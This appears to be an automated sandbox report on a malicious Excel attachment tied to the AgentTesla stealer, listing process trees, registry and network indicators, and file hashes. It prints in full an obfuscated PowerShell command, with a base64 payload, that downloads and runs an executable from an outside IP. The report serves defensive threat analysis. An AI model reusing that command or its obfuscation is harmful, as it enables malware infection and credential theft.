Malware Analysis Report

2024-12-07 14:09

Sample ID 241112-hemp6sxbrk
Target DRAFT BL & MBL PO NO ECM1D2403-29.xls
SHA256 0980c818b185071ebf00005388e6d09283692a33cdd5a28005b76c0018960f40
Tags
agenttesla defense_evasion discovery execution keylogger spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0980c818b185071ebf00005388e6d09283692a33cdd5a28005b76c0018960f40

Threat Level: Known bad

The file DRAFT BL & MBL PO NO ECM1D2403-29.xls was found to be: Known bad.

Malicious Activity Summary

agenttesla defense_evasion discovery execution keylogger spyware stealer trojan upx

Agenttesla family

AgentTesla

Process spawned unexpected child process

Blocklisted process makes network request

Downloads MZ/PE file

Evasion via Device Credential Deployment

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

UPX packed file

Suspicious use of SetThreadContext

AutoIT Executable

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Enumerates system info in registry

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Uses Volume Shadow Copy service COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy WMI provider

Suspicious behavior: AddClipboardFormatListener

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-12 06:39

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-12 06:39

Reported

2024-11-12 06:41

Platform

win7-20240903-en

Max time kernel

142s

Max time network

144s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\DRAFT BL & MBL PO NO ECM1D2403-29.xls"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1676 set thread context of 536 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2864 wrote to memory of 2680 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 2864 wrote to memory of 2680 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 2864 wrote to memory of 2680 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 2864 wrote to memory of 2680 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 2680 wrote to memory of 1604 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 1604 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 1604 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 1604 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 1648 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2680 wrote to memory of 1648 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2680 wrote to memory of 1648 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2680 wrote to memory of 1648 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1648 wrote to memory of 1664 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1648 wrote to memory of 1664 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1648 wrote to memory of 1664 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1648 wrote to memory of 1664 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2680 wrote to memory of 1676 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 2680 wrote to memory of 1676 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 2680 wrote to memory of 1676 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 2680 wrote to memory of 1676 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 1676 wrote to memory of 536 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1676 wrote to memory of 536 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1676 wrote to memory of 536 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1676 wrote to memory of 536 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1676 wrote to memory of 536 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1676 wrote to memory of 536 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1676 wrote to memory of 536 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1676 wrote to memory of 536 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\DRAFT BL & MBL PO NO ECM1D2403-29.xls"

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe

"C:\Windows\SysTEm32\windowspOWeRsheLl\v1.0\powERsHeLl.eXe" "pOWeRSHelL -Ex bypasS -NOp -w 1 -C DEViCEcReDeNtiALdEpLOYMeNT ; iex($(iEX('[SystEm.TEXT.eNCodIng]'+[ChAR]58+[CHAR]0x3A+'uTf8.GetStRinG([SysteM.cOnveRt]'+[CHaR]58+[CHAr]58+'FroMbASe64STRinG('+[Char]34+'JFA4OFdJYWNrc1AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYmVSREVGaU5JVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOVFhndHZ0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElCcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5Tix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU0hhaExkWVRmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG94Y1NTY0FSKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaHBBY3JBVXAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHlZalRCc0pMcmx6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQODhXSWFja3NQOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MC93aW5uaXQuZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U1RBcnQtc0xlRVAoMyk7U3RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHdpbm5pdC5leGUi'+[cHaR]0x22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bypasS -NOp -w 1 -C DEViCEcReDeNtiALdEpLOYMeNT

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ocv1odh_.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES95BB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC95BA.tmp"

C:\Users\Admin\AppData\Roaming\winnit.exe

"C:\Users\Admin\AppData\Roaming\winnit.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Roaming\winnit.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.82:80 r10.o.lencr.org tcp
US 192.3.176.141:80 192.3.176.141 tcp
KR 221.146.204.133:443 4t.gg tcp
US 192.3.176.141:80 192.3.176.141 tcp
US 192.3.176.141:80 192.3.176.141 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp

Files

memory/1548-1-0x0000000072ACD000-0x0000000072AD8000-memory.dmp

memory/1548-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2864-18-0x00000000026B0000-0x00000000026B2000-memory.dmp

memory/1548-19-0x0000000002E80000-0x0000000002E82000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 55469833d7799c93bcff0151aac1fac3
SHA1 748b81efe28ebb013531752809c11645072b0ec6
SHA256 e12cc9a5371af2690e667664fcb4485a17086afc05be76f7547ea3c757a05e7c
SHA512 18810a85d67d14fa5daa81c6adfd74e3322942053778fc99e48dfbc525aca9778792ac72e122a3dc23f7d09a4040e3bc67ab6c6f29a544dc3624f49a544398ec

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

MD5 81132b36583c8271c57dea829ba9e703
SHA1 733155c25e7d1d2de1fd3ccc344687f8e3acf405
SHA256 c53f813e6a53f3e5579a06f2ada1c6829797a20e83b7702d6988de6dd3c19a0e
SHA512 03eaecf39525bbc457de040b82767addf8492ce69642a7a3861d167db441105db5905bfddfa8d61adfd4e00518ed70e929cd1f9fd4ff2c07242694c307c992a4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

MD5 2e3125315d4e0e452bfae34b0173468a
SHA1 8c7e8b5840c18f62f4e78fb4da127618107f5830
SHA256 0126b5d3d27e325b5fd941de68acf7ebf4efe9cea47d0a9da4bedc69b7fd2950
SHA512 aa70dd1413cc21341ca4b9674839646cc172ffbf981c6cbad80c7f814c45a1a160844838e559c780525ff78645979c2dbd6b3e84b04289df3961e1c6e7f09ec9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 91a948bad6e782c079892521f81d3d4e
SHA1 fdb2aec7efdb01c76bd27e2dfd30752160ef9b1f
SHA256 e0157f605e6faf185ae1e0480ee0cb3f63427e5fe54a6341cf73cf4cbaaba6f7
SHA512 ffc6c71221c8755d0a2b05c4d4614dc75634c8d4f703da0e54c2d41e28a6b45bb1cd49d71c87d6d625d029cb78a5c5fba062e0099ab14304af5d7496ab0fd9fe

C:\Users\Admin\AppData\Local\Temp\Cab8D90.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\creatingnextleeverthingswithentireprocessgetitinonlineback[1].hta

MD5 e69934eff6238d7a043cf35938fd4ad3
SHA1 de69f4785657104ad260b25c6e09231f566991f1
SHA256 46af3b6280d8707438e4c2f4c8134ddafe46a4c59799b84e55645b384b4aa208
SHA512 c821bd8f363f22f941093588a9f7772a479d930daf190124be13a7f493fe73debb1c535990d9cb5c3982234e3572202a42c95087ea90e0681cc32509e79e722b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 4a8a7ccc92be041135050ee09493f9df
SHA1 236e7038ab3c8167098ce50cc035c4d091d05e4f
SHA256 4980b1c542fdef791a7ac8d436bd84663439196dcae593c8e442dc530741ce79
SHA512 afd93c766212ce030db78e8a2ebcbca16112038cb0e0522a469c24823340c6cd0456d2820af1a1bae8c2abb1a0e4b2fd1b9dfeb0a5bf2195ef298a7816ce29e4

\??\c:\Users\Admin\AppData\Local\Temp\ocv1odh_.cmdline

MD5 ca591f07374597d96c1a8120de1c786e
SHA1 9b5c4faf1f4bed1642c8f9d9d81e17b7750d0a55
SHA256 8e0c9b2edc00baa5f34fcac98245dda553e1ff280f3512383eb96e5d74dc811a
SHA512 73daa3d52e8822742e3a8d4807016c93944ae46097edf5aceea02174719d77ce029bf05dbbd29fd6dcf20411540a948cce922aad5af5c05487b9a43aff58fa67

\??\c:\Users\Admin\AppData\Local\Temp\ocv1odh_.0.cs

MD5 465b4325ef1dc4adfed6e9822e476e55
SHA1 2fa23c543ae1210d7b44ed6410522ccb5671e001
SHA256 ba069a73c9bf86bc2bc6bfc8532e250817a987761f5ff33d9816c3581efa196c
SHA512 6acd9cdd680e29d3f81813a4011cd0252f0132834393a3c2b40e9ece2c9173accc46eccd29eb9712af8042a0e97472be8a2a265301742612aab28cb8a0f2c1e8

\??\c:\Users\Admin\AppData\Local\Temp\CSC95BA.tmp

MD5 22a7dd2defd95574761960499b9dfa56
SHA1 af5f537b9f14f7c254fc97fab667b61d5407ad5b
SHA256 6cd621f34a88f5ee145d77d0f078c4ada230cfb67270de2000de304d92bdc2cd
SHA512 91da2cbbe9ca0724bd51f3bbe0eb15844301ea6bda4c32056151567672bbe63697e9947b17ecbd288277e51d5824b04c7d6ac2627f2292660f92e10dc2e172d0

C:\Users\Admin\AppData\Local\Temp\RES95BB.tmp

MD5 c905ea629ecb6d8428b94c0ecf3cbe73
SHA1 1fb8355e223142e69fd07a7e4c33dbc81995be47
SHA256 5e6a1c07878207c857324929f919b6a9d45036a2eafa6559648064bf7edc7a18
SHA512 456e56878b0520463583486f6ebb0d749cecaa384c2038be5cd54ac55716e1b4b76955997bd07bc033f7d1095b8614b7f94fe319b87ba110d8b5f4d961207505

C:\Users\Admin\AppData\Local\Temp\ocv1odh_.dll

MD5 64dceeceafc4fd549f6ff6e48a475d1c
SHA1 0145f1d1158d3c6b8c7642653d302b6c42e2c9d5
SHA256 ff7cab3e65a9757318150d0beab335bed481d958002db001f9d58128eeae3479
SHA512 d87c26129b32428fa10885caf847ea03a4abb337287b240a753e274c9dca21e6e9f0f1cbbf7928ebaa249c481e6b56fe584b7e8872400bb1a0abe4b8086474a5

C:\Users\Admin\AppData\Local\Temp\ocv1odh_.pdb

MD5 aa37b06540a90275bee9efd0e415574d
SHA1 879352fe88db2ca9694897424f6d7123032e0d10
SHA256 7ec0a42cce47a1941b20759045d769637ae9b43459300b0cf534b2952b23d65f
SHA512 0c3f301e68c068670fc339f4911fa33b0c1f909d587acc25b6ba59a8046c7df98602392ad327621d908e68f92d9127b69b6c047d8823ae725777ff374dc9cb1c

C:\Users\Admin\AppData\Roaming\winnit.exe

MD5 ed7480dfd2d2fd5742d7b4eff9c1d26d
SHA1 5a69a5ec59e9bfcd221ca0925d774516debfdf4b
SHA256 166fec0187fb56dd61b937fa2c903a762102e1c139b47682eafa4cce0e991e7d
SHA512 f19a8832f998225d0f1043422f6800377fcf7dda282ba88c8d333d3734a884eccadf28babd70ae7f9f249c29355b237dd690c03d74e207fbe6e12c866255270b

memory/2680-68-0x0000000006A10000-0x0000000006C1D000-memory.dmp

memory/1676-70-0x0000000000090000-0x000000000029D000-memory.dmp

memory/1548-66-0x0000000072ACD000-0x0000000072AD8000-memory.dmp

memory/536-73-0x0000000000400000-0x0000000000446000-memory.dmp

memory/536-74-0x0000000000400000-0x0000000000446000-memory.dmp

memory/1676-76-0x0000000000090000-0x000000000029D000-memory.dmp

memory/536-77-0x0000000002020000-0x0000000002074000-memory.dmp

memory/536-78-0x0000000002070000-0x00000000020C2000-memory.dmp

memory/536-79-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-103-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-80-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-122-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-82-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-134-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-84-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-86-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-88-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-90-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-92-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-94-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-96-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-98-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-100-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-104-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-108-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-114-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-120-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-132-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-136-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-130-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-128-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-126-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-124-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-118-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-116-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-112-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-110-0x0000000002070000-0x00000000020BD000-memory.dmp

memory/536-106-0x0000000002070000-0x00000000020BD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-12 06:39

Reported

2024-11-12 06:41

Platform

win10v2004-20241007-en

Max time kernel

145s

Max time network

137s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\DRAFT BL & MBL PO NO ECM1D2403-29.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 112 wrote to memory of 2488 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 112 wrote to memory of 2488 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\DRAFT BL & MBL PO NO ECM1D2403-29.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
US 8.8.8.8:53 133.204.146.221.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 75.210.23.2.in-addr.arpa udp
US 192.3.176.141:80 192.3.176.141 tcp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 141.176.3.192.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
